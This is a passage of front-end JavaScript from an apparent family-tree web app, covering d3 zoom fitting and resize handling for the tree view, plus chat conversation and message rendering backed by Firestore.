            // ([-focPad, width + focPad]) and set the initial transform
            // to translate(_focContainerW/2, margin.top).scale(0.9).
            // d3.tree() places Focused nodes symmetrically around x=0
            // (the polygamous cluster head), so negative-x content sat
            // outside the extent's left wall and couldn't be panned to;
            // small trees weren't centered because containerW/2 is
            // pixels but the transform interprets it as viewBox units.
            // Both problems collapse when the extent + fit come from
            // actual content bounds.
            if (effectiveFocus === 'focused' && treeZoomBehavior && allNodes.length > 0) {
                const _fitClip = document.getElementById('ebw-ftv-scroll-clip');
                const _fitContainerW = (_fitClip && _fitClip.clientWidth) || 316;
                const _fitContainerH = (_fitClip && _fitClip.clientHeight) || 326;
                // With the viewBox aspect matched to the container in
                // the setup block above, the visible viewBox region is
                // the full viewBox (no letterbox). Viewport size in
                // viewBox coord = viewBox width × height. viewBox width
                // is the design constant (width = 1400); viewBoxH was
                // derived to match container aspect.
                const _vpVbW = width;
                const _vpVbH = _ftvFocusedGeom
                    ? _ftvFocusedGeom.viewBoxH
                    : Math.round(width * _fitContainerH / _fitContainerW);

                // Content bounds from actual node positions. Extend by
                // card halves + padding so the FURTHEST card can be
                // panned fully into view instead of half-clipped at the
                // translateExtent wall.
                let contentMinX = Infinity, contentMaxX = -Infinity;
                let contentMinY = Infinity, contentMaxY = -Infinity;
                allNodes.forEach(n => {
                    if (n.x < contentMinX) contentMinX = n.x;
                    if (n.x > contentMaxX) contentMaxX = n.x;
                    if (n.y < contentMinY) contentMinY = n.y;
                    if (n.y > contentMaxY) contentMaxY = n.y;
                });
                const cardHalfW = 75;
                const cardHalfH = 55;
                const contentPad = 40;
                contentMinX -= cardHalfW + contentPad;
                contentMaxX += cardHalfW + contentPad;
                contentMinY -= cardHalfH + contentPad;
                contentMaxY += cardHalfH + contentPad;

                const _contentW = contentMaxX - contentMinX;
                const _contentH = contentMaxY - contentMinY;
                const _contentCX = (contentMinX + contentMaxX) / 2;
                const _contentCY = (contentMinY + contentMaxY) / 2;

                // Fit-and-center: scale so bounds fit inside viewport
                // with 5% margin, cap at 1 (never zoom in above
                // native), then translate so content center maps to
                // viewport (viewBox) center.
                const _fitK = Math.min(_vpVbW / _contentW, _vpVbH / _contentH, 1) * 0.95;
                const _initTx = _vpVbW / 2 - _contentCX * _fitK;
                const _initTy = _vpVbH / 2 - _contentCY * _fitK;
                const _fitTransform = d3.zoomIdentity.translate(_initTx, _initTy).scale(_fitK);

                // translateExtent = content bounds expanded by half
                // viewport (in world coords) on each side. d3.zoom's
                // "viewport must lie within extent" clamps a small
                // tree in place otherwise; the half-viewport pad lets
                // the user pan smaller trees around freely without
                // ever losing content off-screen.
                const _halfVW = (_vpVbW / _fitK) / 2;
                const _halfVH = (_vpVbH / _fitK) / 2;
                treeZoomBehavior.translateExtent([
                    [contentMinX - _halfVW, contentMinY - _halfVH],
                    [contentMaxX + _halfVW, contentMaxY + _halfVH],
                ]);
                svg.call(treeZoomBehavior.transform, _fitTransform);
                _ftvCurrentFitK = _fitK;
                // Stored fit transform is what the "Fit to view" button
                // applies via a 300ms d3 transition. Refresh this
                // whenever _fitK / _fitTransform is recomputed (setup
                // here, and inside _refitFtvFocusedOnResize) so the
                // button always targets the current fit.
                _ftvFitTransform = _fitTransform;

                _ftvFocusedGeom = {
                    // Content bounds — the source of truth for the
                    // refit path on resize/rotation. Do NOT rebuild
                    // from viewBox in _refitFtvFocusedOnResize; that
                    // was the original bug.
                    contentMinX, contentMinY, contentMaxX, contentMaxY,
                    contentCX: _contentCX, contentCY: _contentCY,
                    contentW: _contentW, contentH: _contentH,
                    // Legacy fields still touched by the refit fallback
                    // and Full-mode branches — kept in sync.
                    viewBoxH: _vpVbH,
                    focPad: 600,
                    initialK: _fitK,
                    marginTop: margin.top,
                };
            }

            // Phase 2: refresh chrome (multi-tree picker + perspective toggle)
            // after each render so it reflects current tree + computed
            // viewer/creator Person ids.
            try { renderFtvChrome(); } catch (e) { console.warn('FTV chrome render failed', e); }

            // Layer 2: schedule a 300ms verification pass. Captures
            // the scroll-clip dimensions the render just used and
            // compares against fresh dims after settle. If they differ
            // by more than 2px, fires the refit trio to re-derive from
            // the settled dimensions. Costs nothing when dims match.
            // Runs after EVERY render (not just first) — cheap and
            // catches any late-settle case regardless of trigger.
            const _selfHealClip = document.getElementById('ebw-ftv-scroll-clip');
            if (_selfHealClip) {
                _scheduleFtvRenderSelfHeal(_selfHealClip.clientWidth, _selfHealClip.clientHeight);
            }
        }

        // T6 scroll chrome wiring. Called after each Full-mode render.
        // Reads the clip's scroll state, enables/disables the arrow buttons,
        // and toggles the edge-fade opacity so the fade only shows when
        // there's more content in that direction.
        function _wireFtvHorizontalScroll() {
            const canvas = document.querySelector('.ebw-ftv-canvas');
            const clip = document.getElementById('ebw-ftv-scroll-clip');
            const btnLeft = document.getElementById('ebw-ftv-scroll-left');
            const btnRight = document.getElementById('ebw-ftv-scroll-right');
            const fadeLeft = document.getElementById('ebw-ftv-fade-left');
            const fadeRight = document.getElementById('ebw-ftv-fade-right');
            if (!canvas || !clip || !btnLeft || !btnRight) return;

            // ebw-ftv-full-active was already applied by
            // _applyFtvModeClass at renderFamilyTree's top (called from
            // setFtvFocusMode with rAF ordering, or defensively on
            // initial-load / tree-switch paths). The `ebw-ftv-scrollable`
            // class remains overflow-driven (added when scroll bands
            // engage) and stays local to this function.
            const hasOverflow = clip.scrollWidth > clip.clientWidth + 1;
            canvas.classList.toggle('ebw-ftv-scrollable', hasOverflow);

            const updateBounds = () => {
                const atStart = clip.scrollLeft <= 1;
                const atEnd = clip.scrollLeft + clip.clientWidth >= clip.scrollWidth - 1;
                // When there's no overflow, both bounds are "at" — both arrows
                // disabled, both fades hidden.
                btnLeft.disabled = !hasOverflow || atStart;
                btnRight.disabled = !hasOverflow || atEnd;
                if (fadeLeft) fadeLeft.classList.toggle('ebw-ftv-hide', !hasOverflow || atStart);
                if (fadeRight) fadeRight.classList.toggle('ebw-ftv-hide', !hasOverflow || atEnd);
            };

            const scrollStep = Math.max(200, Math.round(clip.clientWidth * 0.6));
            btnLeft.onclick = () => clip.scrollBy({ left: -scrollStep, behavior: 'smooth' });
            btnRight.onclick = () => clip.scrollBy({ left: scrollStep, behavior: 'smooth' });
            clip.onscroll = updateBounds;

            if (hasOverflow) {
                const centerScroll = Math.max(0, (clip.scrollWidth - clip.clientWidth) / 2);
                clip.scrollLeft = centerScroll;
            }
            updateBounds();
        }

        // Full-mode geometry snapshot for the resize handler. Populated at
        // the end of each Full-mode render; consumed by the debounced
        // ResizeObserver callback below. Focused mode leaves this null.
        // Touch Full mode also leaves this null (d3.zoom is the transform
        // owner there — see _setupTouchFullZoom below).
        let _ftvFullModeGeom = null;
        // Focused mode geometry snapshot — populated at end of each Focused
        // render with the container-derived viewBox height + design pad.
        // Consumed by _refitFtvFocusedOnResize to re-clamp translateExtent
        // and (if the user hasn't zoomed) refit the initial transform on
        // container size changes (orientation flip, browser resize).
        let _ftvFocusedGeom = null;
        let _ftvResizeObserver = null;
        let _ftvResizeTimer = null;

        // Touch Full mode state — populated when d3.zoom takes over Full
        // mode on touch devices. Enables the refit-on-resize path that
        // only re-centers if the user hasn't zoomed. Nulled when leaving
        // touch Full so a stale callback can't apply to Focused or desktop.
        let _ftvTouchFullInitialTransform = null;
        let _ftvTouchFullBounds = null;

        // Current fit-to-view scale for the active mode. Refreshed on
        // every d3.zoom initial-transform apply (Focused setup, touch
        // Full setup, and touch Full refit-on-resize). The zoom filter
        // reads this to decide whether single-touch should pan the tree
        // (user has zoomed in past fitK * 1.1) or fall through to page
        // scroll (user is at ~fit view). Nulled when d3.zoom is not in
        // use (desktop Full).
        let _ftvCurrentFitK = null;
        // Stored fit transform for the "Fit to view" button. Refreshed
        // in the same places _ftvCurrentFitK is (Focused post-layout,
        // touch Full initial, and both refit-on-resize paths). The
        // button (resetTreeZoom) applies this via a 300ms d3 transition
        // — zero recomputation at click time, so it always targets the
        // CURRENT fit even after rotation/resize.
        let _ftvFitTransform = null;

        // Touch capability detection. `pointer: coarse` = primary input
        // is a touch surface (phones, tablets); false for mouse/trackpad
        // laptops. Used to gate whether Full mode uses d3.zoom (touch) or
        // the offsetX + scroll-band scheme (desktop). Explicit capability
        // check rather than viewport-width so a small desktop window still
        // gets desktop behavior.
        function _isTouchDevice() {
            return typeof window !== 'undefined'
                && typeof window.matchMedia === 'function'
                && window.matchMedia('(pointer: coarse)').matches;
        }

        // Recompute offsetX + reapply g transform when the FTV panel width
        // changes. No layout re-run — just the centering math. Skips when
        // there's no geometry snapshot, when Focused mode is active, or
        // when the tree is wider than the viewport (scroll case owns the
        // horizontal geometry).
        function _recenterFtvInFull() {
            if (!_ftvFullModeGeom) return;
            if (appState.ftvFocusMode === 'focused') return;
            const clipEl = document.getElementById('ebw-ftv-scroll-clip');
            if (!clipEl) return;
            const svgViewportWidth = clipEl.clientWidth;
            if (!svgViewportWidth) return;
            const geom = _ftvFullModeGeom;
            if (geom.contentWidth >= svgViewportWidth) return;
            const svgWidth = svgViewportWidth;  // < contentWidth branch already returned
            const offsetX = (svgWidth - geom.treeWidth) / 2 - geom.treeMinX;
            const svgEl = document.getElementById('tree-display');
            if (!svgEl) return;
            svgEl.setAttribute('width', svgWidth);
            svgEl.setAttribute('viewBox', `0 ${geom.viewMinY} ${svgWidth} ${geom.svgH}`);
            svgEl.style.width = svgWidth + 'px';
            const gEl = svgEl.querySelector('g.ftv-content-group');
            if (gEl) gEl.setAttribute('transform', `translate(${offsetX}, 0)`);
        }

        // Refit touch Full mode on resize. If the current d3.zoom transform
        // ≈ initial (user hasn't zoomed), recompute fit-to-width for the
        // new viewport and apply. If user has zoomed, preserve their
        // transform and only update translateExtent to the new bounds.
        function _refitTouchFullOnResize() {
            if (!_ftvTouchFullInitialTransform || !_ftvTouchFullBounds) return;
            if (!treeZoomBehavior) return;
            if (appState.ftvFocusMode === 'focused') return;
            const svgEl = document.getElementById('tree-display');
            const clipEl = document.getElementById('ebw-ftv-scroll-clip');
            if (!svgEl || !clipEl) return;
            const viewportWidth = clipEl.clientWidth;
            if (!viewportWidth) return;

            const current = d3.zoomTransform(svgEl);
            const init = _ftvTouchFullInitialTransform;
            const isInitial =
                Math.abs(current.k - init.k) < 0.01 &&
                Math.abs(current.x - init.x) < 1 &&
                Math.abs(current.y - init.y) < 1;

            const b = _ftvTouchFullBounds;
            // Always recompute the fit for the new viewport and store
            // it — the Fit-to-view button reads this so it always
            // targets the CURRENT-dimensions fit, regardless of the
            // user's current zoom state.
            const fitScale = Math.min(viewportWidth / b.treeWidth, 1);
            const treeCenterX = (b.treeMinX + b.treeMaxX) / 2;
            const initTx = viewportWidth / 2 - treeCenterX * fitScale;
            const initTy = b.padTop - b.contentMinY * fitScale;
            const newInit = d3.zoomIdentity.translate(initTx, initTy).scale(fitScale);
            _ftvTouchFullInitialTransform = newInit;
            _ftvFitTransform = newInit;
            if (isInitial) {
                // User hasn't touched the zoom — apply the refit.
                _ftvCurrentFitK = fitScale;
                d3.select(svgEl).call(treeZoomBehavior.transform, newInit);
                // Also update the SVG width/viewBox to the new viewport.
                d3.select(svgEl)
                    .attr('width', viewportWidth)
                    .attr('viewBox', `0 0 ${viewportWidth} ${b.svgH}`)
                    .style('width', viewportWidth + 'px');
            }
            // Else: user has zoomed. Preserve their transform + fitK. The
            // filter's k > fitK * 1.1 check still works correctly against
            // the pre-rotation fitK — after rotation the fit width may
            // shift slightly but the user's zoomed-in state is the intent.
            // translateExtent is bound to tree bounds (not viewport), so
            // it's still valid.
        }

        // Focused mode refit on resize/orientation change. Reads FRESH
        // clientWidth/Height inside the debounced callback (never uses
        // captured stale dimensions). ViewBox height tracks container
        // aspect using the SAME design width the layout uses (1400),
        // so viewBox aspect matches container exactly — no letterbox.
        // For real-tree renders (treeZoomBehavior + content bounds in
        // _ftvFocusedGeom) the translateExtent is re-derived from
        // CONTENT bounds and the fit-and-center transform is re-applied
        // ONLY if the user hasn't zoomed. If the user HAS zoomed, their
        // transform + fitK are preserved. Empty-state renders (no d3.
        // zoom) still get their viewBox refit so the SVG box aspect
        // tracks the container across rotation/resize.
        function _refitFtvFocusedOnResize() {
            if (appState.ftvFocusMode !== 'focused') return;
            const svgEl = document.getElementById('tree-display');
            const clipEl = document.getElementById('ebw-ftv-scroll-clip');
            if (!svgEl || !clipEl) return;
            const containerW = clipEl.clientWidth;
            const containerH = clipEl.clientHeight;
            if (!containerW || !containerH) return;
            // width = 1400 is the design constant used everywhere in
            // the Focused layout math; matching it here keeps viewBox
            // aspect = container aspect exactly.
            const _designWidth = 1400;
            const newViewBoxH = Math.round(_designWidth * containerH / containerW);
            // Same as the initial setup: NO height attr (feedback loop
            // via intrinsic size + flex parent). viewBox provides
            // aspect, style height:100% provides pixel dimensions.
            d3.select(svgEl)
                .attr('height', null)
                .attr('viewBox', `0 0 ${_designWidth} ${newViewBoxH}`);
            // Real-tree branch: re-derive translateExtent + refit
            // transform from CONTENT bounds (not viewBox). Empty-state
            // renders skip.
            if (treeZoomBehavior && _ftvFocusedGeom && _ftvFocusedGeom.contentMinX !== undefined) {
                const geom = _ftvFocusedGeom;
                const _vpVbW = _designWidth;
                const _vpVbH = newViewBoxH;
                const _fitK = Math.min(_vpVbW / geom.contentW, _vpVbH / geom.contentH, 1) * 0.95;
                const _halfVW = (_vpVbW / _fitK) / 2;
                const _halfVH = (_vpVbH / _fitK) / 2;
                treeZoomBehavior.translateExtent([
                    [geom.contentMinX - _halfVW, geom.contentMinY - _halfVH],
                    [geom.contentMaxX + _halfVW, geom.contentMaxY + _halfVH],
                ]);
                // Always recompute + store the fit transform for the
                // current dimensions, regardless of whether the user
                // has zoomed. Fit-to-view button reads this stored
                // value; if the user zooms in, rotates the device, and
                // then taps fit, we want to return to the CURRENT-
                // dimensions fit, not the fit from before rotation.
                const _initTx = _vpVbW / 2 - geom.contentCX * _fitK;
                const _initTy = _vpVbH / 2 - geom.contentCY * _fitK;
                const _fitTransform = d3.zoomIdentity.translate(_initTx, _initTy).scale(_fitK);
                _ftvFitTransform = _fitTransform;

                const current = d3.zoomTransform(svgEl);
                const isInitial = Math.abs(current.k - geom.initialK) < 0.01;
                if (isInitial) {
                    d3.select(svgEl).call(treeZoomBehavior.transform, _fitTransform);
                    _ftvCurrentFitK = _fitK;
                    geom.initialK = _fitK;
                }
                // Else preserve the user's transform. _ftvCurrentFitK
                // (which gates the single-finger pan filter k > fitK *
                // 1.1) stays at its last value — the user's zoomed-in
                // intent wins over rotation-induced fit changes.
                geom.viewBoxH = newViewBoxH;
            }
        }

        // Dispatch to whichever mode's refit path is active: desktop
        // recenter (guards on _ftvFullModeGeom), touch refit (guards
        // on _ftvTouchFullInitialTransform), or Focused refit (guards
        // on ftvFocusMode + _ftvFocusedGeom). Called from both the
        // ResizeObserver AND the first-render measurement self-heal
        // (see _scheduleFtvRenderSelfHeal below).
        function _refitFtvAllModes() {
            _recenterFtvInFull();
            _refitTouchFullOnResize();
            _refitFtvFocusedOnResize();
        }

        // Attach the ResizeObserver once per render. Disconnects any prior
        // observer so we don't stack across re-renders. Debounces 100ms so
        // a drag doesn't trigger dozens of recomputes per second.
        function _wireFtvResizeObserver() {
            const clipEl = document.getElementById('ebw-ftv-scroll-clip');
            if (!clipEl || typeof ResizeObserver === 'undefined') return;
            if (_ftvResizeObserver) _ftvResizeObserver.disconnect();
            _ftvResizeObserver = new ResizeObserver(() => {
                if (_ftvResizeTimer) clearTimeout(_ftvResizeTimer);
                _ftvResizeTimer = setTimeout(_refitFtvAllModes, 100);
            });
            _ftvResizeObserver.observe(clipEl);
        }

        // First-render measurement self-heal (layer 2 of the throttled-
        // refresh race fix). Captures the scroll-clip dims used by the
        // just-completed render, then 300ms later reads FRESH dims. If
        // they differ by more than 2px in either direction, fires the
        // refit trio to re-derive fit/extent from the settled dimensions
        // — the same code path the ResizeObserver would fire if the
        // container had grown during the interval. Costs nothing when
        // dims match (comparison returns early, no refit).
        //
        // Why this exists: on throttled first loads (font swap, iOS URL
        // bar dvh settle, saved-tab visibility flip), the container can
        // be measured mid-transition. Layer 1 (fonts.ready + double-RAF
        // in renderFamilyTree) covers most cases, but any settle-order
        // this device produces that layer 1 missed lands here.
        let _ftvRenderMeasuredDims = null;
        let _ftvSelfHealTimer = null;
        function _scheduleFtvRenderSelfHeal(w, h) {
            _ftvRenderMeasuredDims = { w, h };
            if (_ftvSelfHealTimer) clearTimeout(_ftvSelfHealTimer);
            _ftvSelfHealTimer = setTimeout(() => {
                _ftvSelfHealTimer = null;
                const clip = document.getElementById('ebw-ftv-scroll-clip');
                if (!clip || !_ftvRenderMeasuredDims) return;
                const freshW = clip.clientWidth;
                const freshH = clip.clientHeight;

                // Invariant 1: dims we measured at render time still
                // match fresh dims (within a 2px slop). If not, layout
                // shifted after render — refit against the fresh dims.
                const dimMismatch =
                    Math.abs(freshW - _ftvRenderMeasuredDims.w) > 2 ||
                    Math.abs(freshH - _ftvRenderMeasuredDims.h) > 2;

                // Invariant 2: canvas class matches current mode. If a
                // class-toggle raced the mode switch and left the wrong
                // regime engaged, Focused is rendering under Full's CSS
                // (no flex-fill → half-size canvas) — but dims can be
                // stable in that bad state, so dim-comparison alone
                // wouldn't catch it. Fix the class + refit.
                const canvas = document.querySelector('.ebw-ftv-canvas');
                const isFull = appState.ftvFocusMode === 'full';
                const hasFullClass = canvas && canvas.classList.contains('ebw-ftv-full-active');
                const classMismatch = canvas && (isFull ? !hasFullClass : hasFullClass);

                // Invariant 3 (Focused only): svg rendered height ≈
                // scroll-clip clientHeight. In Focused mode the SVG
                // must fill the clip via CSS 100%; if the SVG rect is
                // materially shorter, something (likely intrinsic-size
                // attribute regression or the wrong class regime)
                // constrained it. Refit to re-derive from settled dims.
                let svgHeightMismatch = false;
                if (appState.ftvFocusMode === 'focused') {
                    const svg = document.getElementById('tree-display');
                    if (svg) {
                        const rectH = Math.round(svg.getBoundingClientRect().height);
                        svgHeightMismatch = Math.abs(rectH - freshH) > 4;
                    }
                }

                // Invariant 4: canvas clientHeight ≈ CSS min-height
                // anchor. Absolute check (not internally-consistent
                // like invariants 1-3): if canvas collapses because
                // Full-mode SVG residual style poisoned the flex
                // chain, the wrong state is internally consistent
                // (canvas=svg=clip all agree at ~237px) so invariants
                // 1-3 pass while the actual anchor is 660px. Only an
                // anchor-value comparison catches it. Fixes: apply
                // mode class (harmless if already correct), reset SVG
                // inline style + attrs (removes Full residuals), then
                // refit against the anchored dims.
                let anchorMismatch = false;
                if (canvas) {
                    const anchor = parseFloat(getComputedStyle(canvas).minHeight);
                    if (Number.isFinite(anchor) && anchor > 0
                        && (anchor - canvas.clientHeight) > 4) {
                        anchorMismatch = true;
                        console.warn('[FTV self-heal] canvas below anchor',
                            { anchor, actual: canvas.clientHeight, mode: appState.ftvFocusMode });
                    }
                }

                if (dimMismatch || classMismatch || svgHeightMismatch || anchorMismatch) {
                    if (classMismatch) _applyFtvModeClass(appState.ftvFocusMode);
                    if (anchorMismatch) {
                        // Clear residual Full-mode SVG intrinsic dims
                        // (attributes + inline width/height styles) so
                        // Focused CSS 100% has a clean parent to resolve
                        // against. The refit below re-sets the viewBox
                        // and inline styles to the right values.
                        const svg = document.getElementById('tree-display');
                        if (svg) {
                            svg.removeAttribute('width');
                            svg.removeAttribute('height');
                            svg.style.width = '';
                            svg.style.height = '';
                        }
                    }
                    _refitFtvAllModes();
                    _ftvRenderMeasuredDims = { w: freshW, h: freshH };
                }
            }, 300);
        }

        // Zoom control functions
        function zoomTreeIn() {
            if (treeSvg && treeZoomBehavior) {
                treeSvg.transition().duration(300).call(treeZoomBehavior.scaleBy, 1.3);
            }
        }

        function zoomTreeOut() {
            if (treeSvg && treeZoomBehavior) {
                treeSvg.transition().duration(300).call(treeZoomBehavior.scaleBy, 0.7);
            }
        }

        function resetTreeZoom() {
            // Apply the STORED fit transform via a 300ms d3 transition.
            // No recomputation here — the transform is refreshed at
            // every fit-defining moment (Focused post-layout, touch
            // Full setup, both refit-on-resize paths) so this button
            // always targets the current fit even after rotation or
            // resize. Prior version hard-coded translate(700,80).scale
            // (0.9) — legacy viewBox-based math from before the
            // content-bounds migration, sending the tree off-canvas.
            if (!treeSvg || !treeZoomBehavior || !_ftvFitTransform) return;
            treeSvg.transition().duration(300).call(treeZoomBehavior.transform, _ftvFitTransform);
        }

        async function loadTreeMembersForChat() {
            // Load tree members so they can be shown in the "New Message" dropdown
            try {
                // Get current tree ID
                if (!appState.currentTreeId) {
                    const myTrees = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/trees`);
                    if (myTrees && myTrees.length > 0) {
                        const myOwnTree = myTrees.find(t => t.role === 'creator');
                        appState.currentTreeId = myOwnTree ? myOwnTree.tree.id : myTrees[0].tree.id;
                    }
                }

                if (appState.currentTreeId) {
                    // Fetch tree members
                    const membersData = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/users`);
                    appState.treeMembers = membersData || [];
                }
            } catch (error) {
                console.error('Error loading tree members for chat:', error);
                appState.treeMembers = [];
            }
        }

        async function openNewMessageModal() {
            // Get tree members if not already loaded
            if (!appState.treeMembers || appState.treeMembers.length === 0) {
                await loadTreeMembersForChat();
            }

            // Populate the direct message dropdown
            const recipientSelect = document.getElementById('message-recipient');
            if (recipientSelect) {
                const memberOptions = (appState.treeMembers || [])
                    .filter(m => m.user.id !== appState.currentUserNeo4jId)
                    .map(m => `<option value="${m.user.id}">${escapeHtml(m.user.name || m.user.email)}</option>`)
                    .join('');

                recipientSelect.innerHTML = `
                    <option value="">-- Select a family member --</option>
                    ${memberOptions}
                `;
            }

            // Populate the group chat checkboxes
            const groupChatFields = document.getElementById('group-chat-fields');
            if (groupChatFields) {
                const checkboxContainer = groupChatFields.querySelector('.max-h-48');
                if (checkboxContainer) {
                    const memberCheckboxes = (appState.treeMembers || [])
                        .filter(m => m.user.id !== appState.currentUserNeo4jId)
                        .map(m => `
                            <label class="flex items-center gap-2 p-2 hover:bg-gray-50 rounded cursor-pointer">
                                <input type="checkbox" name="group-participants" value="${m.user.id}" class="w-4 h-4 text-primary border-gray-300 rounded focus:ring-2 focus:ring-primary">
                                <span class="text-sm">${escapeHtml(m.user.name || m.user.email)}</span>
                            </label>
                        `).join('');

                    if (memberCheckboxes) {
                        checkboxContainer.innerHTML = memberCheckboxes;
                    } else {
                        checkboxContainer.innerHTML = '<p class="text-sm text-gray-500 p-2">No family members available</p>';
                    }
                }
            }

            // Reset form fields
            const groupNameInput = document.getElementById('group-name');
            if (groupNameInput) groupNameInput.value = '';

            const firstMessageInput = document.getElementById('first-message');
            if (firstMessageInput) firstMessageInput.value = '';

            // Reset the custom recipient picker to placeholder state
            const recipientLabel = document.getElementById('message-recipient-label');
            if (recipientLabel) {
                recipientLabel.textContent = '-- Select a family member --';
                recipientLabel.classList.add('text-gray-500');
                recipientLabel.classList.remove('text-gray-800');
            }
            const recipientSelectReset = document.getElementById('message-recipient');
            if (recipientSelectReset) recipientSelectReset.value = '';

            const errorDiv = document.getElementById('new-message-error');
            if (errorDiv) errorDiv.textContent = '';

            // Ensure we're on the direct message tab by default
            toggleChatType('direct');

            // Now open the modal
            openModal('new-message-modal');
        }

        async function fetchAndRenderConversations() {
            const convoListDiv = document.getElementById('conversation-list');
            if (!convoListDiv) return;
            convoListDiv.innerHTML = `<p class="p-4 text-gray-500 text-center">Loading conversations...</p>`;
            try {
                const conversations = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/conversations`);
                appState.conversations = conversations;

                if (conversations.length === 0) {
                    convoListDiv.innerHTML = ebwEmptyState({
                        icon: 'message-circle',
                        heading: 'No conversations yet',
                        body: 'Start a direct message with a family member, or create a group chat with several at once.',
                        primaryAction: { label: '+ New message', onclick: 'openNewMessageModal()' },
                        learnMoreAnchor: 'chat',
                    });
                } else {
                    convoListDiv.innerHTML = conversations.map(c => {
                        let displayName, initials;

                        if (c.type === 'group') {
                            // Group chat: show group name or list of participants
                            if (c.name) {
                                displayName = c.name;
                                initials = c.name.split(' ').map(n => n[0]).join('').substring(0, 2).toUpperCase();
                            } else {
                                // Show participant names
                                const participantNames = c.participants_info
                                    ? c.participants_info.map(p => p.name || p.email).join(', ')
                                    : 'Group Chat';
                                displayName = participantNames;
                                initials = '👥';
                            }
                        } else {
                            // Direct message: show the other participant
                            const participant = c.participants_info && c.participants_info[0];
                            displayName = participant ? (participant.name || participant.email || 'Unknown User') : 'Unknown User';
                            initials = participant && participant.name ? participant.name.split(' ').map(n => n[0]).join('').substring(0, 2).toUpperCase() : '?';
                        }

                        const lastMessageText = c.lastMessage || 'No messages yet';
                        const unreadBadge = c.unread_count > 0 ? `<span class="ml-2 px-2 py-0.5 text-xs font-semibold text-white bg-primary rounded-full">${c.unread_count}</span>` : '';

                        // Format timestamp
                        let timeDisplay = '';
                        if (c.lastUpdated && c.lastUpdated._seconds) {
                            const date = new Date(c.lastUpdated._seconds * 1000);
                            const now = new Date();
                            const diffMs = now - date;
                            const diffMins = Math.floor(diffMs / 60000);
                            const diffHours = Math.floor(diffMs / 3600000);
                            const diffDays = Math.floor(diffMs / 86400000);

                            if (diffMins < 1) timeDisplay = 'Just now';
                            else if (diffMins < 60) timeDisplay = `${diffMins}m ago`;
                            else if (diffHours < 24) timeDisplay = `${diffHours}h ago`;
                            else if (diffDays < 7) timeDisplay = `${diffDays}d ago`;
                            else timeDisplay = date.toLocaleDateString();
                        }

                        return `
                            <div onclick="selectConversation(this.dataset.convoId)"
                                 class="conversation-item p-4 border-b hover:bg-gray-50 cursor-pointer transition-colors flex items-center gap-3"
                                 data-convo-id="${escapeHtml(c.id)}">
                                <!-- Avatar -->
                                <div class="flex-shrink-0">
                                    <div class="w-12 h-12 rounded-full bg-gradient-to-br from-primary to-purple-600 flex items-center justify-center text-white font-semibold">
                                        ${escapeHtml(initials)}
                                    </div>
                                </div>
                                <!-- Content -->
                                <div class="flex-1 min-w-0">
                                    <div class="flex items-center justify-between mb-1">
                                        <h4 class="font-semibold text-gray-900 truncate">${escapeHtml(displayName)}${unreadBadge}</h4>
                                        <span class="text-xs text-gray-500 ml-2">${escapeHtml(timeDisplay)}</span>
                                    </div>
                                    <p class="text-sm text-gray-600 truncate">${escapeHtml(lastMessageText)}</p>
                                </div>
                            </div>
                        `;
                    }).join('');
                }
            } catch (e) {
                console.error('Error loading conversations:', e);
                convoListDiv.innerHTML = `<p class="p-4 text-red-600 text-center">Could not load conversations</p>`;
            }
        }
        async function selectConversation(conversationId) {
            if (appState.firestoreUnsubscribe) appState.firestoreUnsubscribe();
            appState.selectedConversationId = conversationId;
            const conversation = appState.conversations.find(c => c.id === conversationId);
            if (!conversation) return;

            document.getElementById('message-view').innerHTML = MessageView(conversation);
            document.querySelectorAll('.conversation-item').forEach(i => i.classList.remove('active'));
            document.querySelector(`[data-convo-id='${conversationId}']`)?.classList.add('active');

            // Master-detail: switch to thread pane on mobile. CSS handles
            // hiding the list; on md+ both panes stay visible regardless.
            setChatMobilePane('thread');

            // Prompt 17: write lastRead[currentUser] on the convo doc so
            // the persistent unread listener drops the dot for this convo.
            // Fires once on open, and again per new incoming message
            // snapshot below.
            markConversationReadInFirestore(conversationId);

            const messageList = document.getElementById('message-list');
            // v9: collection() accepts variadic path segments so the old
            // .collection().doc().collection() chain collapses to a single
            // call. query() wraps for the orderBy modifier.
            const messagesRef = query(
                collection(db, 'conversations', conversationId, 'messages'),
                orderBy('timestamp')
            );

            appState.firestoreUnsubscribe = onSnapshot(messagesRef, querySnapshot => {
                const messages = [];
                querySnapshot.forEach(doc => {
                    messages.push({ id: doc.id, ...doc.data() });
                });

                messageList.innerHTML = renderMessages(messages, conversation);
                messageList.scrollTop = messageList.scrollHeight;

                // Mark messages as read
                markConversationRead(conversationId);
                // Prompt 17: also update lastRead on every message snapshot
                // so a new incoming message while the convo is on-screen
                // doesn't linger as unread. serverTimestamp guarantees
                // the write beats the just-arrived message's timestamp.
                markConversationReadInFirestore(conversationId);
            }, error => {
                console.error('Error loading messages:', error);
                messageList.innerHTML = `<p class="text-red-600 text-center p-4">Could not load messages</p>`;
            });

            const form = document.getElementById('message-form');
            if (form) {
                form.replaceWith(form.cloneNode(true)); // Remove old listeners
                document.getElementById('message-form').addEventListener('submit', handleSendMessage);
                setupFilePreview(); // Setup file input preview
            }
        }

        function renderMessages(messages, conversation) {
            if (messages.length === 0) {
                return `<div class="flex items-center justify-center h-full text-gray-400">
                    <p>No messages yet. Start the conversation!</p>
                </div>`;
            }

            let lastDate = null;
            return messages.map((msg, index) => {
                const isMe = msg.senderId === appState.currentUserNeo4jId;
                const sender = conversation.participants_info?.find(p => p.id === msg.senderId);
                const senderName = sender ? (sender.name || sender.email || 'Unknown') : 'Unknown';
                const initials = sender && sender.name ? sender.name.split(' ').map(n => n[0]).join('').substring(0, 2).toUpperCase() : '?';

                // Format timestamp
                let timeDisplay = '';
                let dateHeader = '';
                if (msg.timestamp && msg.timestamp.seconds) {
                    const date = new Date(msg.timestamp.seconds * 1000);
                    timeDisplay = date.toLocaleTimeString([], { hour: '2-digit', minute: '2-digit' });

                    // Add date header if day changed
                    const dateStr = date.toDateString();
                    if (dateStr !== lastDate) {
                        lastDate = dateStr;
                        const today = new Date().toDateString();
                        const yesterday = new Date(Date.now() - 86400000).toDateString();
                        let displayDate = date.toLocaleDateString();
                        if (dateStr === today) displayDate = 'Today';
                        else if (dateStr === yesterday) displayDate = 'Yesterday';

                        dateHeader = `<div class="text-center my-4"><span class="px-3 py-1 text-xs text-gray-500 bg-gray-100 rounded-full">${displayDate}</span></div>`;
                    }
                }

                // Render reactions
                const reactions = msg.reactions || {};
                const reactionDisplay = Object.keys(reactions).length > 0 ?
